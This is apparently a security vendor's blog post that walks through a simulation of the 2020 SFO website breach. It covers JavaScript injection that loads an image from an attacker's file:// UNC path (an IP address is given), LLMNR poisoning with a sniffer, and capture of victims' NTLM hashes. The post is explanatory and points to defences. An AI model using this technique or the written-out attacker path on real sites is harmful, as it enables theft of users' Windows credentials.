On April 7, 2020, the San Francisco International Airport (SFO) released a notice confirming that two of its websites, SFOConnect.com and SFOConstruction.com, were targets of a cyberattack in March 2020. The attack has been attributed to a hacker group that was attempting to steal the Windows logins of the airport’s employees.

When we hear news about cyberattacks, a few typical, yet crucial questions spring to mind: How did the attackers perform the cyberattack? Why did the airport authorities take so long to discover the breach? Could the breach have been prevented? And most importantly, am I at risk too?

The attack involved the use of the Server Message Block (SMB) protocol, a client-server communication protocol used for sharing access to files, printers, and serial ports in a network. In order to acquire a deeper understanding and examine the possible reasons behind the breach, we took up the mammoth task of simulating the breach on our end.

STEP 1: INTRUSION 

After hacking the SFO employee sites, attackers injected a small piece of JavaScript code on the website.

If you observe the highlighted region in the image above, you’ll notice that the src (source) points to an image on a remote system (file://51.159.28.101/icon.png). As you have probably already realized, the code inserts an image into the website’s HTML.

STEP 2: SETTING UP A NETWORK SNIFFER ON THE ATTACKER’S SYSTEM

 We now need to set up the attacker’s system, or the remote system from which the code is trying to fetch the image from. The system can be a non-domain system too.

 A network sniffer, a tool that captures any request coming from other hosts, must be installed next.

The above image is a publicly available PowerShell script that poisons all Link-Local Multicast Name Resolution (LLMNR) requests.

 We will examine LLMNR in detail in future blog posts, but for now, all you need to know is that LLMNR is like a backup DNS server used for resolving hostnames when the DNS fails to find a hostname. Below is a visual representation of the attack.

The above is an example of an SMB-relay attack.

STEP 3: DUMP VICTIM NTLM HASHES TO THE ATTACKER’S SYSTEM 

  • \\Serv1 in the above representation is the PNG file injected in to the website.

  • The victim user’s browser attempts to locate the image using its UNC path FILE:// from the attacker’s system using the SMB protocol.

  • Thanks to the network sniffer, attackers are now able to retrieve the NTLM hashes of the victim.

The prospect of being on the receiving end of one of these attacks is scary, but there are ways to prevent them. If you want to learn about the possible defense measures for SMB-relays, and also about various kinds of attacks on hybrid Active Directory, visit our presentation here.

 If you require any further assistance, drop your questions in the comment section below, and I’d be more than happy to help!

 NOTE: The attack outlined above is a similar concept to the San Francisco International Airport breach, but the actual tools used and the attack method may vary.